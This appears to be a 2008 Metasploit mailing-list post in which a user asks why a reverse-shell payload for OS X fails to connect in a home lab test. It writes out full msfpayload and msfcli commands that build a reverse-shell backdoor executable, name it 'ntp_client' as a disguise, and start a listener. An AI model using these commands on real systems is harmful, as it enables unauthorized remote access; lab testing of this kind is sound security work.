Metasploit mailing list archives

./msfpayload question


From: tiberius01 at gmx.net (tiberius01 at gmx.net)
Date: Fri, 06 Jun 2008 13:26:50 +0200

Dear list,

I was playing around with the ./msfpayload to test several reverse executable backdoors on windows, linux and osx.
As example the windows/meterpreter/reverse_tcp was working brilliant on several windows versions, 
but it was not possible to get the  osx/x86/shell_reverse_tcp payload up and running.

My test Victim: macbook - 10.5.3 (firewall, little snitch > disabled)
My test Attacker: powerbook(ppc) - 10.4.11 ((firewall, little snitch > disabled)

I've already done the following steps:

/attacker/
# ./msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.1.51 LPORT=123 X > ntp_client
#  chmod +x ntp_client

/victim/
# ./ntp_client

/attacker/
# ./msfcli exploit/multi/handler PAYLOAD=osx/x86/shell_reverse_tcp LPORT=123 LHOST=192.168.1.51 E


Afterwards no connection could be established  - Does anyone have an suggestion?


Thanks in Advance,
Tiberius
-- 
Der GMX SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen! 
Ideal f?r Modem und ISDN: http://www.gmx.net/de/go/smartsurfer



Current thread: